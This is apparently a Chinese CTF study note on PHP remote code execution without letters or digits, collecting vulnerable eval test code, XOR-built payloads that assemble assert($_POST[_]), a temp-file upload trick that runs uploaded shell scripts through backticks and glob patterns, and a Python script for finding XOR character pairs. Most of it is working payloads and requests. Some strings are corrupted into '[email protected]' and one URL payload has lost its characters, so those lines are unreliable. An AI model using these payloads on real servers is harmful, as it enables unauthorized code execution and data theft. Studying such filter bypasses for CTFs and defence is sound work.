无字母数字RCE

版本为php5

php5中assert是一个函数，我们可以通过$f{=}^{\prime }asser{t}^{\prime };$f(…);这样的方法来动态执行任意代码。

但php7中，assert不再是函数，变成了一个语言结构（类似eval），不能再作为函数名动态执行代码，所以利用起来稍微复杂一点。但也无需过于担心，比如我们利用file_put_contents函数，同样可以用来getshell。

无数字和字母rce

测试代码

<?php

if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {

 eval($_GET['shell']);

}



<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);

在这里面经过url编码的字符能够绕过

所以%01这些不会被匹配

<?php

$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');//$_='assert';

$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';

$___=$$__;

$_($___[_]); //所有的合起来就是 assert($_POST[_]);

payload

http://127.0.0.1/test/p.php?shell=$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);

还要post一个参数

_=phpinfo();

同理

_=print_r(scandir('/'));可以直接获取根目录了

_=print_r(scandir(getcwd()));

参考链接:https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

对于linux中的shell是支持正则表达式的，当你忘记某些字符时可以通过? % *来代替

所以我们要执行一个命令的话可以直接用?替代

而且大多数服务器都是用的linux

直接在kali里面实验了

不过用这种方法rce 的话需要上传一个临时文件

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <title>POST数据包POC</title>

</head>

<body>

<form action="http://" method="post" enctype="multipart/form-data">

<!--链接是当前打开的题目链接-->

  <label for="file">文件名：</label>

  <input type="file" name="file" id="file"><br>

  <input type="submit" name="submit" value="提交">

</form>

</body>

</html>

在这个文件下写入需要调用的命令

#!/bin/sh

ls

意思是调用ls命令

当然肯定还是要先获取文件内容我们默认上传的文件会保存在/tmp目录下

命名为/tmp/phpxxxxxx

利用``内$会解析的特性,通过位运算,执行系统命令

[@-[]是linux下面的匹配符，是进行匹配的大写字母。

所以

shell=?><?=`. /???/????????[@-[]`;?>

用+代替空格绕过

抓包修改文件内容就可以任意命令执行了

不过不知道为什么有时候有有时候没有,记得多刷新几次

参考链接:https://www.freebuf.com/articles/web/186298.html

无字母rce

测试代码

<?php

show_source(__FILE__);

$mess=$_POST['mess'];

if(preg_match("/[a-zA-Z]/",$mess)){

  die("invalid input!");

}

eval($mess);

读取到了当前同一个目录下的p.php

mess=?><?=$_="3317!315288"^"@[^@[email protected]^@@[]";$_(("0"^"@").(".").("030"^"@[@"));

这串字符串的意思是show_source(p.php)

不过是需要异或运算后

这里有个异或运算脚本

valid = "[email protected]$%^*(){}[];\'\",.<>/?-=_`~ "

answer = "show_source"

tmp1, tmp2 = '', ''
for c in answer:
  for i in valid:
    for j in valid:
      if (ord(i) ^ ord(j) == ord(c)):
        tmp1 += i
        tmp2 += j
        break
    else:
      continue
    break
print(tmp1, tmp2)

除此之外也可以用上面的方法

Url:

http://127.0.0.1/test/p.php?shell=$_=(''^'').(''^'').(''^'');$__='_'.(' '^']').('%2F'^'`').(''^']').('	'^']');$___=$$__;$_($___[_]);

post数据:

mess=$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);&_=phpinfo();

当然我肯定先用glob()看看当前目录有什么东西

穿越到上级目录就用…/

mess=$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);&_=print_r(show_source('p.php'));